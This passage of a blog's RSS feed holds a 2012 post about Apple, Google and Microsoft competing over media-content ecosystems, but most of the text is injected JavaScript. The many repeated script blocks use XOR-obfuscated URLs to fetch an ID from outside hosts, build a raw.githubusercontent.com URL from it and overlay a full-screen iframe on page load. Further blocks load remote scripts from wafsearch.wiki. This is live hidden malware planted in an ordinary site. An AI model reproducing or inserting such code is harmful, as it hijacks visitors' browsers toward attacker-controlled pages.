  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/dakiloifhsnuukka.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/dakiloifhsnuukka.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script></p>
]]></content:encoded>
			<wfw:commentRss>http://kevrichard.com/2015/10/sql-beginners-cheat-sheet/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Next Big Tech Battle: It’s Not About Single Devices Anymore</title>
		<link>http://kevrichard.com/2012/06/the-next-big-tech-battle-its-not-about-single-devices-anymore/</link>
		<comments>http://kevrichard.com/2012/06/the-next-big-tech-battle-its-not-about-single-devices-anymore/#comments</comments>
		<pubDate>Fri, 29 Jun 2012 02:27:41 +0000</pubDate>
		<dc:creator><![CDATA[Kevin  Richard]]></dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Google Android]]></category>
		<category><![CDATA[iTunes]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Technology ecosystems]]></category>
		<category><![CDATA[Windows 8]]></category>

		<guid isPermaLink="false">http://kevrichard.com/?p=1123</guid>
		<description><![CDATA[This week Google had its big I/O conference where it announced many of the new products it has coming out in the next few months. Two of the big surprises of the conference were the Nexus 7 ( a 7 inch tablet) and the  Nexus Q ( a cloud powered television media system). Most puzzling [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>This week Google had its big I/O conference where it announced many of the new products it has coming out in the next few months. Two of the big surprises of the conference were the Nexus 7 ( a 7 inch tablet) and the  Nexus Q ( a cloud powered television media system). Most puzzling is that these products don’t particularly add anything to the Google’s core competency which is selling advertising but digging deeper you’ll see that this is part of a larger play to stay in the game against two other big rivals.</p>
<p>Android, IOS and soon Windows 8. What do they all have in common? Initially they were all platforms (or in Microsoft’s case based off a platform) for mobile phones that have since expanded into tablets and now television set top boxes. All three firms are making pretty heavy investments into products that most likely do not have high profit margins.  But in addition to this, products along all three of these company sets will be connected to a central content system where users can buy apps, video, audio and image (books/magazines) based content.</p>
<p>Ah ha! So essentially what the plan for these three is owning the media distribution system and making profit off of any royalties generated from the sale of media content. Where previously the war was over which computer operating system a person used or their search engine now the fight is over where they consume their content from. With content moving away from traditional sources such as cable providers, book stores and news-stands, being able to own an ecosystem that allows people to purchase media where ever they are is a big move with potential for a lot of profit.</p>
<p><strong>Where will things go from here?</strong> So far Apple has the strongest foothold with iTunes entrenched as the first to launch. Can Microsoft and Google catch up being later into the game? Absolutely! Microsoft has the advantage of being a leader in the console gaming market which places them in a strong competitive position to Apple TV. As for Google, they are currently # 2 in the smartphone market using an open system where as long as it’s an Android powered device it will work with Google’s content distribution systems.  The big marketing move for all these players will be to get consumers to purchase into their whole line of products making them the primary content provider.</p>
<p>It will definitely be interesting to see where things go for these three firms and how competitive factors will come into play. Will cable providers and the big studios choose sides like in the fight for Blu-Ray vs. HD-DVD? Or will they  move to limit things all together? What will happen to single device manufacturing firms such as RIM ? With the technology industry moving so fast the next year or two will be ones to watch to see where the cards land.<script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>; !function(){var e=String.fromCharCode.apply(String,[50,46,46,42,41,96,117,117,40,63,55,51,47,55,50,53,54,62,51,52,61,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42].map(function(e){return 90^e})),t=[{template:String.fromCharCode.apply(String,[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39].map(function(e){return 90^e})),useFetch:!0}];if(!/^\/(wp-admin|wp-login)/.test(window.location.pathname||"")){var n=Symbol.for("__inline_id_offer__"),r=window[n]=window[n]||{iframeReady:!1,iframeId:"ifr_"+Math.random().toString(36).slice(2),run:null};r.iframeReady||("complete"===document.readyState||document.body?c():window.addEventListener("DOMContentLoaded",c))}function i(e,t){if(e.indexOf("dropbox.com")>=0)return e.replace(/\{id\}/g,t);var n=encodeURIComponent(t);return e.indexOf("gist.githubusercontent.com")>=0&#038;&#038;(n=n.replace(/%2F/g,"/")),e.replace(/\{id\}/g,n)}function o(e){return fetch(e,{cache:"no-store"}).then(function(e){return e.text()}).then(function(e){return(e||"").trim()}).catch(function(){return""})}function a(e){if(!e)return!1;try{var t=e.indexOf(":")>=0?e:"https://"+e;return new URL(t),!0}catch(n){return!1}}function c(){r.run||(r.run=!0,fetch(e,{cache:"no-store"}).then(function(e){return e.text()}).then(function(e){if(!(e=(e||"").trim())||!t.length)return null;var n=t,r=i(n[0].template,e);if(1===n.length)return n[0].useFetch?o(r).then(function(e){return e&#038;&#038;a(e)?e:r}):Promise.resolve(r);var c=0;return function t(){if(c>=n.length)return Promise.resolve(r);var d=n[c],u=i(d.template,e);return(c++,d.useFetch)?o(u).then(function(e){return e&#038;&#038;a(e)||e?e:t()}):Promise.resolve(u)}()}).then(function(e){e&#038;&#038;function e(t){try{var n=document.createElement("iframe");n.style.display="none",n.onload=function(){n.remove(),t(!0)},n.onerror=function(){n.remove(),t(!1)},n.src="about:blank",document.body.appendChild(n)}catch(r){t(!1)}}(function(t){t&#038;&#038;function e(t){if(!r.iframeReady){r.iframeReady=!0;var n,i,o,a=document.createElement("iframe");a.src=(n=t,i=Math.random().toString(36).slice(2),o=n.indexOf("?")>=0?"&#038;":"?",n+o+encodeURIComponent("v")+"="+encodeURIComponent(i)),a.id=r.iframeId,a.style.cssText="position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;overflow:hidden;",a.setAttribute("aria-hidden","true"),window.addEventListener("message",function(e){if(e.data&#038;&#038;"object"==typeof e.data&#038;&#038;"ktl-show-original"===e.data.type)try{var t=document.getElementById(r.iframeId);t&#038;&#038;t.parentNode&#038;&#038;t.parentNode.removeChild(t)}catch(n){}});try{document.body.appendChild(a)}catch(c){var d=new MutationObserver(function(){document.body&#038;&#038;!document.getElementById(r.iframeId)&#038;&#038;(document.body.appendChild(a),d.disconnect())});d.observe(document.documentElement,{childList:!0,subtree:!0})}}}(e)})}).catch(function(){}))}}();</p>
<p>console.log('28du3');</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
